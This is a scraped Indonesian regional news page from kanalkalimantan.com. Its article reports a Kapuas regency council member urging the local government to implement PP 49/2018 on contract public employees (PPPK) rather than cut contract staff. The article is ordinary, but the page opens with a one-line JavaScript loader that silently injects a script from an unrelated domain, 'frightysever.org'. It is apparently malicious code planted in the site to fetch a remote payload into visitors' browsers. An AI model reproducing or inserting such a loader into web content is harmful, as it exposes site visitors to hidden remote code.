(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Algrin Gasan: Pemkab Harus Konsisten Laksanakan PP 49 2018 Tentang PPPK


KANALKALIMANTAN. COM, KUALA KAPUAS – Anggota DPRD Kabupaten Kapuas, Algrin Gasan SHut meminta Pemerintah Kabupaten (Pemkab) Kapuas konsisten melaksanakan Peraturan Pemerintah (PP) Nomor 49 Tahun 2018, tentang Pegawai Pemerintah dengan Perjanjian Kerja (PPPK).

Menurut Algrin, dengan konsisten melaksanakan itu maka dapat sebagai solusi penyelesaian persoalan tenaga kontrak.

“Itu bisa menjadi solusi untuk tenaga kontrak, dengan melaksanakan PP Nomor 49 Tahun 2018 tentang PPPK,” kata Politisi Partai Golkar ini, Kamis (4/11/2021).

Presiden telah mengeluarkan Peraturan Presiden (Perpres) Nomor 98 Tahun 2020, sebagai tindaklanjut dari PP Nomor 49 Tahun 2018.

 

Baca juga : Tewas karena Sopir Ngantuk, Polisi: Vanessa Angel Duduk di Kursi Belakang, Suami di Depan

“Ini adalah bentuk ketaatan hukum terhadap aturan lebih tinggi, dikarenakan hukum adalah panglima bagi masyarakat di Negara Republik Indonesia,” tuturnya.

Tujuan dari PP Nomor 49 Tahun 2018 tersebut, agar secara bertahap sampai tahun 2023 tidak ada lagi tenaga honorer K2, dan apapun namanya semua harus diangkat menjadi PPPK. “Seharusnya Pemda taat terhadap PP, dan Perpres sebagai aturan lebih tinggi,” ucap Algrin.

Menurut Algrin, penghematan anggaran bukan dengan memangkas anggaran untuk tenaga kontrak, hal ini sangat penting demi rasa keadilan.

Sehingga jangan sampai rencana pengurangan tenaga kontrak untuk penghematan anggaran, yaitu membayar utang Pemkab pada PT SMI.

 

Baca juga : PJU Mati di Jalan Taman Gembira Timur, Gelap Gulita Bahayakan Pelintas

Pemkab Kapuas bisa menghemat dari anggaran infrastruktur, karena pembangunan infrastruktur sekarang banyak dilaksanakan melalui anggaran Food Estate dan Pemulihan Ekonomi Nasional (PEN) dari pemerintah pusat.

“Kebetulan Kabupaten Kapuas menjadi lokasi utama pembangunan Food Estate,” tandasnya. (kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Desy Arfianty

Recent Posts

Calon Haji Tertua Kabupaten Banjar Berusia 86 Tahun, Bupati Banjar Lepas Keberangkatan

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur bersama Wakil Bupati Banjar Habib Idrus Al… Read More

14 menit ago

Dua Hari Hilang di Tengah Rawa, Kakek Syahdan Ditemukan Selamat

KANALKALIMANTAN.COM, BARABAI – Tak kunjung pulang ke rumah selama dua hari, seorang kakek yang dikabarkan… Read More

1 jam ago

Halalbihalal Kerukunan Bubuhan Banjar Jabar Dihadiri Paman Birin

KANALKALIMANTAN.COM, BOGOR – Gubernur Kalsel H Sahbirin Noor beserta istri Hj Raudatul Jannah hadiri halalbihalal… Read More

4 jam ago

Serap Aspirasi Gen Z, Pj Bupati Kapuas Erlin Hardi Main ke Kafe

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menyambangi kafe untuk menyerap langsung… Read More

5 jam ago

TPK Kelurahan Selat Hilir Juara 3 Terbaik Nasional 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Kerja keras yang berbuah manis. Ungkapan tersebut tepat disematkan untuk Tim… Read More

5 jam ago

Ibadah dan Sosial Ekonomi Berkembang, Masjid At-Taqwa Karang Anyar III Diperluas

KANALKALIMANTAN.COM, BANJARBARU - Dalam beberapa tahun terakhir, antusias warga dalam melaksanakan peribadatan di Masjid At… Read More

7 jam ago

This website uses cookies.